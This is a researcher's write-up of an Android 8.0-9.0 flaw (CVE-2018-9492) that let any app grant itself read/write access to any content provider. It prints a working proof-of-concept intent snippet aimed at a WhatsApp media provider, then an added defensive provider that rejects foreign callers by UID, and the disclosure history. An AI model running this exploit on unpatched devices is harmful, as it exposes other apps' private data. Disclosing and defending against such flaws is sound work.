Global grant URI in Android 8.0-9.0 (2018)

Any third-party application was able to grant itself read/write access to any content provider installed in the system, whether exported or not, and even when the provider was protected by permissions. It did not matter whether the content provider was declared in AndroidManifest with the grantUriPermissions flag, or whether it was exported at all. A third-party app could access any content provider in the system without user interaction.

// Target: a URI that belongs to another app's content provider.
Uri uri = Uri.parse("content://com.whatsapp.provider.media/item/5");
// The intent is addressed to our own activity, so no other app is involved.
Intent intent = new Intent(Intent.ACTION_MAIN);
intent.setClassName(getPackageName(), MainActivity.class.getName());
// Ask the system to grant the receiver (ourselves) read/write access to the URI.
intent.addFlags(Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
intent.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
intent.addFlags(Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION);
// The URI rides in EXTRA_STREAM; a vulnerable system grants it without checking
// that the sender owns the provider or that the provider allows grants at all.
intent.putExtra(Intent.EXTRA_STREAM, uri);
intent.setType("*/*");
startActivity(intent);

And that's all :) When you launch that code on a vulnerable Android version, your app receives access to the passed "uri" value. You could open any content provider in the system!
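From the app owner's side, the only thing left to do when the framework's grant bookkeeping can be fooled like this is to stop trusting it alone for data that is never meant to be shared. The provider below is an added example, not code from the original post: PrivateNotesProvider is a hypothetical provider (declared with android:exported="false" and no grantUriPermissions) that re-checks the calling UID in every callback, so a bogus grant still ends in a SecurityException.

```java
import android.content.ContentProvider;
import android.content.ContentValues;
import android.database.Cursor;
import android.net.Uri;
import android.os.Binder;
import android.os.ParcelFileDescriptor;
import android.os.Process;
import java.io.FileNotFoundException;

// Added example, not code from the original post. PrivateNotesProvider is a hypothetical
// provider declared with android:exported="false" and no grantUriPermissions.
public class PrivateNotesProvider extends ContentProvider {
    // Defense in depth: when a framework bug hands another app a URI grant, the provider's
    // callbacks still run with that app as the binder caller, so the provider can refuse it.
    // Read the UID before any clearCallingIdentity(), otherwise it reports our own UID.
    private void enforceSameUid(String op, Uri uri) {
        int caller = Binder.getCallingUid();
        if (caller != Process.myUid()) {
            throw new SecurityException(
                    "private provider: " + op + " on " + uri + " denied for uid " + caller);
        }
    }
    @Override public boolean onCreate() { return true; }
    @Override public String getType(Uri uri) { return "vnd.android.cursor.item/vnd.example.note"; }

    @Override
    public Cursor query(Uri uri, String[] projection, String selection,
                        String[] selectionArgs, String sortOrder) {
        enforceSameUid("query", uri);
        return null; // the real implementation would read the app's own database here
    }
    @Override public Uri insert(Uri uri, ContentValues values) {
        enforceSameUid("insert", uri);
        return null;
    }
    @Override public int update(Uri uri, ContentValues values, String where, String[] args) {
        enforceSameUid("update", uri);
        return 0;
    }
    @Override public int delete(Uri uri, String where, String[] args) {
        enforceSameUid("delete", uri);
        return 0;
    }
    // openFile is the callback an EXTRA_STREAM style grant is normally used to reach.
    @Override public ParcelFileDescriptor openFile(Uri uri, String mode) throws FileNotFoundException {
        enforceSameUid("openFile", uri);
        throw new FileNotFoundException(uri.toString()); // nothing to serve in this example
    }
}
```

This check also rejects legitimate grants, so it only fits providers that are never shared with other apps; a provider that intentionally hands out URIs via grantUriPermission needs the framework fix instead.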

PoC demo:


This funny bug was reported on 30.08.2018.
And then the answer came:
The Android Security Team believes that this is a duplicate of a report previously submitted by another external researcher on July 26, 2018.

So, for me it was a duplicate.
The original bug information is as follows:

  • CVE-2018-9492
  • Author: Michał Bednarski 
